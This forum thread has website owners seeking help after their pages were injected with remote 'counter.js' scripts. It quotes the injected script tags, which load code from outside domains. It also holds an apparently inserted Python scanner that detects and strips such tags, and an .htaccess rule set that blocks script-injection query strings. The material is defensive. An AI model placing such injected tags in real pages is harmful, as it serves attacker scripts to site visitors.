Acute help - Server hit by virus!

Hello everybody

We are seeking urgent advice and guidance and hope for your help!

Our website has unfortunately been hit by a virus (or several) and we therefore urgently need help and we would be extremely grateful for any advice.

We have our server at Hetzner.de

Problem 1: Removing a virus
Our acute need is to solve the problem of how we get rid of the virus on a server.
So far we have run into 2 viruses with different filenames; they are as follows:
sa-rpg.net/counter.js and sitesenfolies.com/counter.js

When you surf around our website, you meet the virus on more or less all pages.
It is not so bad that you cannot close the virus threat again if you, for example, use AVG Free Antivirus (IF you have antivirus, which many unfortunately do not). The situation feels even worse because we know nothing about what we can do or how to do it.

Problem 2: Cause and protection, how can we avoid viruses?
How to install antivirus or similar on a server?
How the virus got in is obviously relevant to us, so that we can protect ourselves; we were not aware that this was our own responsibility at Hetzner.
We have no knowledge or experience with virus protection on a server. This is a point where we also hope you will share your knowledge with us.

We are unsure what information we should provide for you to advise and/or help us, so do not hesitate to ask for more detailed information.

Thanks in advance for your help - any input is welcome!
 
What operating system are you running on the server? Is it fully patched? It seems you may be having JavaScript issues.
 
Thanks for the answer John

The operating system is Linux, but I don't know what you mean by "fully patched"? We are not server administrators.

Do you have a reason why you think it is because of JavaScript issues, and advice on what we can do to check where the virus is and how we can remove it?

We are still hoping for more help and advice - Thank you!
 
Hi,
Our Cpanel is Parallels Plesk Panel 9.5, and we can see there is a firewall, but it seems to be set to allow access from all except for forwarded traffic.

Antivirus
We just went in under 'updates' while looking for some antivirus settings. We found that there are updates for the cpanel we haven't installed, and when selecting the latest 10.2 we can see that the components we can select include 'Kaspersky antivirus' and 'Parallels Premium antivirus'; these are not installed and not selected by default.

Is this where we install the antivirus, or is it not enough?
We assume it covers both protection and scanning; do you have any experience with this?
 
sa-rpg.net/counter.js and sitesenfolies.com/counter.js

If these are the filenames that AVG is saying are bad, then .js refers to JavaScript. It could be a badly written page, or you have ads on the pages that AVG doesn't like. You need to contact a network admin who knows what he is doing to sort out your issue.
 
Same problem here

Hi,

I have the same problem here...
Some JavaScript injection in my index pages (I have 3 index.html and index.php).
The line is:
<script type="text/javascript" src="http://www.myspice.ro/counter.js"></script>
or
<script type="text/javascript" src="http://www.hnldesigns.com/counter.js"></script>
or...
the URL changes every time, but it is always "counter.js".

I really don't know how to prevent that...
I changed my FTP password but that didn't fix it...
I'll try to change the permissions on these files but... :s

If someone encounters the same problem and finds a solution, I'll be glad to hear it :)
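Both the first post (the counter.js files AVG flagged) and this one (the injected `<script src="http://.../counter.js"></script>` line in index files) describe the same symptom, so here is an added example, not code from anyone in this thread, that scans a web root for script tags loading a remote counter.js and can strip them from a page. Function names, the sample page and the example.invalid host are my own constructions; the regex assumes the tag looks like the lines quoted above.

```python
"""Find and strip injected remote counter.js script tags (added example)."""
import re
from pathlib import Path

# Matches a <script> tag whose src is a remote http(s) URL ending in /counter.js,
# the shape of the injected lines quoted in the thread. Case-insensitive and
# tolerant of extra attributes or whitespace. Local scripts (src="/js/x.js")
# do not match because the URL must start with http:// or https://.
INJECTED_TAG = re.compile(
    r"""<script\b[^>]*\bsrc\s*=\s*["']?(https?://[^"'\s>]+/counter\.js)["']?[^>]*>\s*</script>""",
    re.IGNORECASE,
)


def find_injected_scripts(html: str) -> list:
    """Return the remote counter.js URLs referenced by script tags in html."""
    return [m.group(1) for m in INJECTED_TAG.finditer(html)]


def strip_injected_scripts(html: str) -> str:
    """Return html with every matching injected tag removed (rest untouched)."""
    return INJECTED_TAG.sub("", html)


def scan_webroot(root, suffixes=(".html", ".htm", ".php")) -> dict:
    """Walk root and map each infected file path to the URLs found in it."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            urls = find_injected_scripts(path.read_text(errors="replace"))
            if urls:
                hits[str(path)] = urls
    return hits


# Constructed sample page resembling the infected index files described above:
# one legitimate local script plus one injected remote counter.js tag.
SAMPLE_INDEX = """<html><head><title>Shop</title>
<script type="text/javascript" src="/js/site.js"></script>
</head><body>Welcome
<script type="text/javascript" src="http://www.example.invalid/counter.js"></script>
</body></html>"""

if __name__ == "__main__":
    for url in find_injected_scripts(SAMPLE_INDEX):
        print("injected script found:", url)
    # Usage on a real server: scan_webroot("/var/www/vhosts") lists infected files.
```

Finding the tags tells you which files were modified; the file modification times and the FTP/panel access logs for that window are what point at how they got there.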
 
Hi,
I'll post what I have done; maybe it will help someone.
I put a .htaccess file with these lines:

# Required by mod_rewrite in a per-directory .htaccess
Options +FollowSymLinks
RewriteEngine On
# Block requests whose query string carries a <script> tag (plain or URL-encoded),
# or tries to set GLOBALS / _REQUEST variables
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# [F] answers with 403 Forbidden, [L] stops further rewriting
RewriteRule ^(.*)$ index.php [F,L]

# Host-specific environment variables used to select PHP settings
SetEnv REGISTER_GLOBALS 0
SetEnv ZEND_OPTIMIZER 1
SetEnv MAGIC_QUOTES 1
SetEnv PHP_VER 5

I think the most important thing is to set the variable register_globals to 0 (or off, depending on your host).
Since then, I haven't had any more problems (except for the fact that Google thinks my website is dangerous v_v).

Hope that helps a little bit. (And sorry for my bad English ^^')
 